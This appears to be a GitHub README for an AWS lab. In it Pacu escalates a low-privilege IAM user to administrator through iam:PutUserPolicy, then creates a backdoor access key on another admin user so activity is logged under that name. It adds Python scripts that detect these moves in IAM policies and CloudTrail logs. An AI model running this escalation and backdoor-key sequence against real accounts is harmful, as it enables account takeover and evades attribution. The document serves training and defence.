jmcwhirter / pacu_pentesting

Pentesting AWS using Pacu

I put together some CloudFormation scripts that support a Pacu demonstration video I found:

https://www.youtube.com/watch?v=FDhhE52a7yE

Prerequisites:

  • AWS CLI, configured with credentials that can create IAM users and EC2 instances (the iam.yaml stack needs CAPABILITY_NAMED_IAM)
  • Pick a region to run from (the walkthrough below uses us-east-1)

Steps:

I prefer to run two tabs, so I'll indicate which tab for each step.

  1. Tab 1: Launch both CloudFormation stacks to create the users and the infrastructure

(continue to the next step while this runs in the background; create-stack returns as soon as the request is accepted, not when the stack is built)

aws cloudformation create-stack --stack-name PacuUsers --template-body file://iam.yaml --capabilities CAPABILITY_NAMED_IAM
aws cloudformation create-stack --stack-name PacuInfrastructure --template-body file://ec2.yaml
  2. Tab 2: Install Pacu (https://github.com/RhinoSecurityLabs/pacu)
  3. Tab 2: Start Pacu and create a session when prompted; the prompts below use a session named 'demo'
  4. Tab 1: Get the access key and secret created by CloudFormation

(Step 1 needs to be complete before you can run this; the Outputs are empty until the PacuUsers stack reaches CREATE_COMPLETE)

aws cloudformation describe-stacks --stack-name PacuUsers --query 'Stacks[0].Outputs'
  5. Tab 2: Configure Pacu with the output access key and secret using the 'set_keys' command. (Publishing a secret key as a stack output is fine for a throwaway lab, but anyone with cloudformation:DescribeStacks on the account can read it, so don't do this outside the lab.)
Pacu (demo:No Keys Set) > set_keys
Setting AWS Keys...
Press enter to keep the value currently stored.
Enter the letter C to clear the value, rather than set it.
If you enter an existing key_alias, that key's fields will be updated instead of added.

Key alias []: careless
Access key ID []: ********************
Secret access key []: ****************************************
Session token (Optional - for temp AWS keys only) [None]:

Keys saved to database.
  6. Tab 2: Set the region you'd like to run in using the 'set_regions' command. If you skip this, Pacu runs every module against all regions, which is slower and generates far more API calls.
Pacu (demo:careless) > set_regions us-east-1
Session regions changed: ['us-east-1']
  7. Tab 2: Right now you're running as a careless user who has a few IAM permissions and nothing else. Don't believe me? Check it out: if we try to get EC2 details using the 'ec2__enum' command, it fails with an access denied on DescribeInstances.
Pacu (demo:careless) > run ec2__enum --instances
  Running module ec2__enum...
[ec2__enum] Starting region us-east-1...
[ec2__enum] FAILURE:
[ec2__enum]   Access denied to DescribeInstances.
[ec2__enum]   Skipping instance enumeration...
[ec2__enum]   0 instance(s) found.
[ec2__enum] No data successfully enumerated.
  8. Tab 2: Let's see whether our careless user has any permissions that allow escalating privileges using the 'iam__privesc_scan' command. The module first lists the escalation methods the user's permissions could support, then tries the confirmed ones; here it finds the user can call iam:PutUserPolicy against itself and uses that to attach an inline administrator policy with a random name.
Pacu (demo:careless) > run iam__privesc_scan
  Running module iam__privesc_scan...
[iam__privesc_scan] Escalation methods for current user:
[iam__privesc_scan]   CONFIRMED: PutUserPolicy
[iam__privesc_scan] Attempting confirmed privilege escalation methods...

[iam__privesc_scan]   Starting method PutUserPolicy...

[iam__privesc_scan] Trying to add an administrator policy to the current user...

[iam__privesc_scan]   Successfully added an inline policy named jyfptpd8pg! You should now have administrator permissions.

[iam__privesc_scan] iam__privesc_scan completed.

[iam__privesc_scan] MODULE SUMMARY:

  Privilege escalation was successful

Whoa! I can haz admin!

  9. Tab 2: Re-run 'ec2__enum --instances'; with the inline admin policy in place it now succeeds.

Pacu (demo:careless) > run ec2__enum --instances
  Running module ec2__enum...
[ec2__enum] Starting region us-east-1...
[ec2__enum]   2 instance(s) found.
[ec2__enum] ec2__enum completed.

[ec2__enum] MODULE SUMMARY:

  Regions:
     us-east-1

    2 total instance(s) found.
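The escalation in step 8 worked because the Careless user's own policy allows iam:PutUserPolicy on the Careless user ARN. The script below is an added example for this walkthrough, not code from this repo or from Pacu: it scans an IAM policy document for the user-targeted escalation methods iam__privesc_scan checks and reports which ones the policy lets a given user run on itself, honouring explicit Deny and IAM's wildcard matching. iam.yaml is not reproduced on the page, so the three policy documents and the account id 123456789012 are constructed stand-ins.

```python
"""Scan an IAM policy document for actions that let a user escalate itself.

Added example for this walkthrough; it is not code from this repo or from
Pacu. iam.yaml is not reproduced on the page, so the policies below are
constructed stand-ins and the account id is made up.
"""
import fnmatch

# Subset of the user-targeted escalation methods iam__privesc_scan checks.
# Any of these, allowed on the caller's own user ARN, is a one-call privesc.
SELF_PRIVESC_ACTIONS = (
    "iam:PutUserPolicy",
    "iam:AttachUserPolicy",
    "iam:CreateAccessKey",
    "iam:CreateLoginProfile",
    "iam:UpdateLoginProfile",
    "iam:AddUserToGroup",
)


def _as_list(value):
    """IAM allows a string or a list in Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(pattern, value):
    """IAM wildcard matching: '*' and '?' only, case-insensitive."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def self_privesc_actions(policy, user_arn):
    """Return the escalation actions `policy` lets `user_arn` run on itself.

    Explicit Deny beats Allow, as in IAM evaluation. Conditions are ignored,
    so the result is an upper bound for Allow statements that carry one.
    NotAction/NotResource statements are rejected rather than guessed at.
    """
    allowed, denied = set(), set()
    for stmt in _as_list(policy.get("Statement")):
        if "NotAction" in stmt or "NotResource" in stmt:
            raise ValueError("NotAction/NotResource are not evaluated here")
        if not any(_matches(r, user_arn) for r in _as_list(stmt.get("Resource"))):
            continue  # statement does not cover this user's ARN
        actions = _as_list(stmt.get("Action"))
        hits = {a for a in SELF_PRIVESC_ACTIONS
                if any(_matches(p, a) for p in actions)}
        (allowed if stmt.get("Effect") == "Allow" else denied).update(hits)
    return sorted(allowed - denied)


USER_ARN = "arn:aws:iam::123456789012:user/Careless"  # constructed account id

# Constructed stand-in for what iam.yaml gives Careless: a few IAM reads plus
# the one write that iam__privesc_scan confirmed above.
CARELESS_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["iam:GetUser", "iam:ListUserPolicies", "iam:PutUserPolicy"],
         "Resource": "arn:aws:iam::123456789012:user/Careless"},
    ],
}

# Same reads, write removed, plus an explicit Deny on every self-escalation
# action as a backstop against a later over-broad Allow.
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["iam:GetUser", "iam:ListUserPolicies"],
         "Resource": "arn:aws:iam::123456789012:user/Careless"},
        {"Effect": "Deny",
         "Action": list(SELF_PRIVESC_ACTIONS),
         "Resource": "*"},
    ],
}

# Looks like "user management only" but the wildcard covers three escalations.
WILDCARD_POLICY = {
    "Version": "2012-10-17",
    "Statement": {"Effect": "Allow", "Action": "iam:*User*", "Resource": "*"},
}

if __name__ == "__main__":
    for label, pol in [("careless", CARELESS_POLICY),
                       ("hardened", HARDENED_POLICY),
                       ("wildcard", WILDCARD_POLICY)]:
        print(f"{label:9} -> {self_privesc_actions(pol, USER_ARN) or 'none'}")
```

Run it against the inline and attached policies of each user you pull from 'aws iam get-user-policy' / 'get-policy-version'; anything it returns for a user's own ARN is a path Pacu's module would find too. The wildcard case is the one worth remembering: iam:*User* reads like housekeeping and still yields PutUserPolicy, AttachUserPolicy and AddUserToGroup.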
  10. Tab 2: Before we do anything else, let's create credentials on another user (in the same account) so our activity doesn't sound the alarms under the Careless name. Let's try to find someone who should already be producing activity using the 'iam__backdoor_users_keys' command. The module needs the user list, so it offers to run 'iam__enum_users_roles_policies_groups' first.
Pacu (demo:careless) > run iam__backdoor_users_keys
  Running module iam__backdoor_users_keys...
[iam__backdoor_users_keys] Data (IAM > Users) not found, run module "iam__enum_users_roles_policies_groups" to fetch it? (y/n) y
[iam__backdoor_users_keys]   Running module iam__enum_users_roles_policies_groups...
[iam__enum_users_roles_policies_groups] Found 4 users
[iam__enum_users_roles_policies_groups] iam__enum_users_roles_policies_groups completed.

[iam__enum_users_roles_policies_groups] MODULE SUMMARY:

  4 Users Enumerated
  IAM resources saved in Pacu database.

[iam__backdoor_users_keys] Backdoor the following users?
[iam__backdoor_users_keys]   ***** (y/n)? n
[iam__backdoor_users_keys]   Careless (y/n)? n
[iam__backdoor_users_keys]   ***** (y/n)? n
[iam__backdoor_users_keys]   UnsuspectingAdmin (y/n)? y
[iam__backdoor_users_keys]     Access Key ID: ********************
[iam__backdoor_users_keys]     Secret Key: ****************************************
[iam__backdoor_users_keys] iam__backdoor_users_keys completed.

[iam__backdoor_users_keys] MODULE SUMMARY:

  1 user key(s) successfully backdoored.

Sweet! We found UnsuspectingAdmin and generated a new access key on that user. The backdoor key is an additional key: the admin's existing key keeps working, so nothing breaks and nobody is prompted to look.

From here we can do whatever we want within whatever tool we want (the AWS CLI, boto3, or Pacu itself), and every call made with the new key is logged in CloudTrail as UnsuspectingAdmin, not Careless. Two lessons: keep those access keys and secrets SECRET, and never grant a user iam:PutUserPolicy (or any other IAM write) on itself, because that is what turned a low-privilege key into admin in a single call.
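Both moves in this walkthrough (PutUserPolicy on the caller's own user in step 8, CreateAccessKey aimed at a different user in step 10) are recorded by CloudTrail, so the "don't sound the alarms" trick only works against an account nobody is reading. The script below is an added example, not code from this repo or from Pacu: it runs three rules over CloudTrail records, including one that keeps firing after the attacker has switched to the admin's key, because the key id in userIdentity gives it away. The records are constructed to mirror the walkthrough in CloudTrail's event shape; the account, key ids and timestamps are made up.

```python
"""Flag the walkthrough's two IAM moves, and later use of the backdoor key,
in CloudTrail records.

Added example; not code from this repo or from Pacu. SAMPLE_TRAIL is a
constructed log file shaped like CloudTrail output (key ids, times made up).
"""
import json

# Policy-changing IAM actions a user should never be allowed on itself.
SELF_PRIVESC = {"PutUserPolicy", "AttachUserPolicy", "AddUserToGroup"}
# Credential-minting actions; suspicious when aimed at a different user.
CRED_ACTIONS = {"CreateAccessKey", "CreateLoginProfile", "UpdateLoginProfile"}


def load_events(text):
    """Parse one CloudTrail log file ({"Records": [...]}) into a list."""
    return json.loads(text)["Records"]


def analyze(events):
    """Return (rule, eventName, caller, detail) tuples in time order.

    self-privesc    caller changed its own user's permissions (step 8)
    cross-user-cred caller minted credentials for another user (step 10)
    backdoor-use    a key minted by someone other than its owner was used
    """
    findings = []
    minted = {}  # access key id -> (owner, minted_by) for cross-user keys
    for ev in sorted(events, key=lambda e: e["eventTime"]):  # ISO-8601 sorts
        ident = ev.get("userIdentity", {})
        caller, key_id = ident.get("userName"), ident.get("accessKeyId")
        # Rule 3 applies to every service, so check it before the IAM filter.
        if key_id in minted:
            owner, by = minted[key_id]
            findings.append(("backdoor-use", ev["eventName"], caller,
                             f"{owner}'s key {key_id} was created by {by}"))
        if ev.get("eventSource") != "iam.amazonaws.com":
            continue
        name = ev["eventName"]
        # IAM calls that omit userName act on the caller itself.
        target = (ev.get("requestParameters") or {}).get("userName") or caller
        if name in SELF_PRIVESC and target == caller:
            findings.append(("self-privesc", name, caller, f"{name} on own user"))
        if name in CRED_ACTIONS and target != caller:
            new_key = ((ev.get("responseElements") or {})
                       .get("accessKey", {}).get("accessKeyId"))
            if new_key:  # remember it so rule 3 can catch its first use
                minted[new_key] = (target, caller)
            findings.append(("cross-user-cred", name, caller,
                             f"{name} for {target}" + (f" (key {new_key})" if new_key else "")))
    return findings


# Constructed records: the denied DescribeInstances from step 7, the
# PutUserPolicy from step 8, the CreateAccessKey from step 10, one call made
# with the backdoor key, and an earlier, benign self key rotation by the admin.
SAMPLE_TRAIL = r"""
{"Records": [
 {"eventTime": "2024-01-01T10:00:00Z", "eventSource": "ec2.amazonaws.com",
  "eventName": "DescribeInstances", "errorCode": "Client.UnauthorizedOperation",
  "userIdentity": {"type": "IAMUser", "userName": "Careless",
                   "accessKeyId": "AKIACARELESS00000001"}},
 {"eventTime": "2024-01-01T10:01:00Z", "eventSource": "iam.amazonaws.com",
  "eventName": "PutUserPolicy",
  "userIdentity": {"type": "IAMUser", "userName": "Careless",
                   "accessKeyId": "AKIACARELESS00000001"},
  "requestParameters": {"userName": "Careless", "policyName": "jyfptpd8pg"}},
 {"eventTime": "2024-01-01T10:02:00Z", "eventSource": "ec2.amazonaws.com",
  "eventName": "DescribeInstances",
  "userIdentity": {"type": "IAMUser", "userName": "Careless",
                   "accessKeyId": "AKIACARELESS00000001"}},
 {"eventTime": "2024-01-01T10:03:00Z", "eventSource": "iam.amazonaws.com",
  "eventName": "CreateAccessKey",
  "userIdentity": {"type": "IAMUser", "userName": "Careless",
                   "accessKeyId": "AKIACARELESS00000001"},
  "requestParameters": {"userName": "UnsuspectingAdmin"},
  "responseElements": {"accessKey": {"accessKeyId": "AKIABACKDOOR00000002",
                                     "userName": "UnsuspectingAdmin",
                                     "status": "Active"}}},
 {"eventTime": "2024-01-01T10:04:00Z", "eventSource": "s3.amazonaws.com",
  "eventName": "ListBuckets",
  "userIdentity": {"type": "IAMUser", "userName": "UnsuspectingAdmin",
                   "accessKeyId": "AKIABACKDOOR00000002"}},
 {"eventTime": "2024-01-01T09:00:00Z", "eventSource": "iam.amazonaws.com",
  "eventName": "CreateAccessKey",
  "userIdentity": {"type": "IAMUser", "userName": "UnsuspectingAdmin",
                   "accessKeyId": "AKIAUNSUSPECT0000003"},
  "requestParameters": {"userName": "UnsuspectingAdmin"},
  "responseElements": {"accessKey": {"accessKeyId": "AKIAUNSUSPECT0000004",
                                     "userName": "UnsuspectingAdmin",
                                     "status": "Active"}}}
]}
"""

EVENTS = load_events(SAMPLE_TRAIL)

if __name__ == "__main__":
    for rule, name, caller, detail in analyze(EVENTS):
        print(f"{rule:15} {name:18} by {caller:18} {detail}")
```

Point load_events at each gzipped file CloudTrail delivers to the trail's S3 bucket and keep the minted map across files; the admin's own key rotation at 09:00 is deliberately not flagged, since CreateAccessKey on yourself is routine, while the ListBuckets at 10:04 is flagged even though it is an innocent-looking read under the admin's name.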

Clean up

Remove the inline policy that CloudFormation does not manage. The name Pacu gave it is random (jyfptpd8pg in the run above), and the command below assumes it is the only inline policy on the user; if your template also attaches inline policies to Careless, run 'aws iam list-user-policies' on its own first and delete the random one by name:

aws iam list-user-policies --user-name Careless --query 'PolicyNames[0]' --output text | xargs -I {} aws iam delete-user-policy --user-name Careless --policy-name {}

Also delete the access key that step 10 created on UnsuspectingAdmin (find it with 'aws iam list-access-keys' and remove it with 'aws iam delete-access-key'). CloudFormation will not delete a user that still has keys or policies it did not create, so the PacuUsers stack deletion fails until both are gone.

Tear down the CloudFormation stacks:

aws cloudformation delete-stack --stack-name PacuUsers
aws cloudformation delete-stack --stack-name PacuInfrastructure
